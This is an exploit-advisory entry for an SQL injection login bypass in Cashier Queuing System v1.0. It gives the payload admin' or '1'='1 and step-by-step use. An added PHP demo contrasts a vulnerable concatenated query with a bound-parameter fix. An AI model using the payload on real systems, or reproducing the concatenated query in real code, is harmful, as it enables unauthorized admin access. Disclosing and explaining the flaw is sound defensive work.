# Exploit Title: Cashier Queuing System V1.0 - SQL Injection Leads to the admin account
# Exploit Author: Kshitij Rewandkar
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Software Link: https://www.sourcecodester.com/php/15047/cashier-queuing-system-live-monitor-and-voice-notification-php-and-sqlite-free-source
# Version: v1.0
# Tested on: Windows 11, Apache
Description: An SQL injection issue in Cashier Queuing System v1.0 allows an attacker to log in to the admin account.
Vulnerable Parameters:
username
password
Payload:
admin' or '1'='1
Steps:
1) Go to the login page: http://localhost/queuing/login.php
2) Enter the payload in both the username and password fields.
Payload: admin' or '1'='1
3) Click submit; you are logged in.
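
Why the payload on this page succeeds against a concatenated login query, and how bound parameters stop it, shown as an added example that is not the application's source or the author's code. The table `user_list`, its columns and both function names are assumptions, and the accounts are constructed sample data.

```php
<?php
// Added example. Table, column and function names are assumptions, not the
// application's own code; the accounts below are constructed sample data.
$db = new SQLite3(':memory:');
$db->exec("CREATE TABLE user_list (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
// Plain-text passwords only so both queries below compare the same way;
// hashing (password_hash/password_verify) is a separate fix.
$db->exec("INSERT INTO user_list (username, password) VALUES
           ('admin', 'constructed-admin-pw'), ('cashier1', 'constructed-cashier-pw')");

// Before: user input is concatenated into the SQL text, so a quote in the
// input ends the string literal and the rest is parsed as SQL.
function login_concat(SQLite3 $db, string $u, string $p): ?string {
    $sql = "SELECT username FROM user_list WHERE username = '$u' AND password = '$p'";
    $row = $db->query($sql)->fetchArray(SQLITE3_ASSOC);
    return $row ? $row['username'] : null;
}

// After: the same query with bound parameters; input is only ever a value.
function login_bound(SQLite3 $db, string $u, string $p): ?string {
    $stmt = $db->prepare('SELECT username FROM user_list WHERE username = :u AND password = :p');
    $stmt->bindValue(':u', $u, SQLITE3_TEXT);
    $stmt->bindValue(':p', $p, SQLITE3_TEXT);
    $row = $stmt->execute()->fetchArray(SQLITE3_ASSOC);
    return $row ? $row['username'] : null;
}

$payload = "admin' or '1'='1";   // the payload listed on this page
$cases = [
    'valid admin login' => ['admin', 'constructed-admin-pw'],
    'wrong password'    => ['admin', 'not-the-password'],
    'payload in both'   => [$payload, $payload],
];
foreach ($cases as $label => [$u, $p]) {
    printf("%-18s concat=%-6s bound=%s\n", $label,
        login_concat($db, $u, $p) ?? 'denied', login_bound($db, $u, $p) ?? 'denied');
}
```

In the concatenated form the WHERE clause becomes `username = 'admin' or '1'='1' AND password = 'admin' or '1'='1'`, which is true for every row, so the first account in the table is returned; the bound form compares the whole payload string against the stored values and matches nothing.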